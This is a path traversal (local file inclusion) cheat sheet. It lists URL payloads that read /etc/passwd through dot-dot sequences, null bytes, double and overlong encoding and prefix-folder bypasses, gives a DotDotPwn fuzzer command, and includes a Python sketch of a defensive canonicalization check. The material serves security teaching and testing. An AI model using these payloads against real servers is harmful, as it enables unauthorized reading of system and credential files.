Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This might include:
Application code and data.
Credentials for back-end systems.
Sensitive operating system files.
Basic LFI and bypasses
http://example.com/home.php?id=../../../etc/passwd
http://example.com/home.php?id=....//....//....//etc/passwd
http://example.com/home.php?id=..///////..////..//////etc/passwd
http://example.com/home.php?id=....\/....\/....\/etc/passwd
http://example.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
http://example.com/home.php?id=/var/www/../../etc/passwd
Null Byte
A null byte terminates the string early, which bypasses code that appends additional characters to the end of the provided string (bypassing: $_GET['param']."php")
http://example.com/home.php?id=../../../../etc/passwd%00
http://example.com/home.php?id=../../../../etc/passwd%00.jpg (append needed extension)
This has been fixed since PHP 5.4.
Encoding
You could use non-standard encodings, such as double URL encoding:
http://example.com/home.php?id=..%252f..%252f..%252fetc%252fpasswd
http://example.com/home.php?id=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/home.php?id=%252e%252e%252fetc%252fpasswd
http://example.com/home.php?id=%252e%252e%252fetc%252fpasswd%00
http://example.com/home.php?id=%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%2fpasswd
From an existing folder
The back end may be verifying that the path starts with an expected folder:
http://example.com/home.php?id=utils/scripts/../../../../../etc/passwd
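On the defensive side, every variant above fails against a check that decodes once, canonicalizes the path, and only then tests that the result is still inside the intended directory. The sketch below is an added example, not code from this page or from any project it mentions; it is written in Python so it can be run offline. The names naive_filter, safe_resolve and classify are hypothetical, and rejecting any leftover "%" is a policy assumption.

```python
import os
import tempfile
from urllib.parse import unquote

def naive_filter(value: str) -> str:
    """Weak filter shown for contrast: removes "../" in one non-recursive pass."""
    return value.replace("../", "")

def safe_resolve(base_dir: str, raw_param: str) -> str:
    """Map a raw query-string value to a canonical path inside base_dir.

    Raises ValueError with the rejection reason otherwise.
    """
    value = unquote(raw_param)  # the one decode a web framework would perform
    if "\x00" in value:
        raise ValueError("NUL byte")
    if "%" in value or "\ufffd" in value:
        # Still percent-encoded after one decode (double encoding), or bytes
        # that are not valid UTF-8 (overlong forms such as %c0%af).
        raise ValueError("suspicious encoding")
    value = value.replace("\\", "/")  # backslashes count as separators
    if value.startswith("/"):
        raise ValueError("absolute path")
    base = os.path.realpath(base_dir)
    # realpath collapses "..", repeated slashes and symlinks before the check.
    candidate = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("escapes base directory")
    return candidate

def classify(raw_param: str) -> str:
    """Check raw_param against a throwaway base directory; return "ok" or the reason."""
    with tempfile.TemporaryDirectory() as base:
        try:
            safe_resolve(base, raw_param)
            return "ok"
        except ValueError as exc:
            return str(exc)

if __name__ == "__main__":
    # Parameter values copied from the payloads listed on this page.
    for raw in ["css/site.css", "../../../etc/passwd",
                naive_filter("....//....//....//etc/passwd"),
                "..%252f..%252f..%252fetc%252fpasswd",
                "..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
                "../../../../etc/passwd%00.jpg",
                "utils/scripts/../../../../../etc/passwd"]:
        print(f"{classify(raw):24} {raw}")
```

The "....//" payload is inert on its own; it only becomes "../" after a single-pass filter such as naive_filter rewrites it, which is why the containment check has to run on the final, canonical path.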
Tools
DotDotPwn is a very flexible, intelligent fuzzer for discovering directory traversal vulnerabilities in software such as HTTP/FTP/TFTP servers and web platforms such as CMSs, ERPs, blogs, etc.
sudo ./dotdotpwn.pl -m http-url -u https://example.com/image?id=TRAVERSAL -O -k "root:"
Wordlists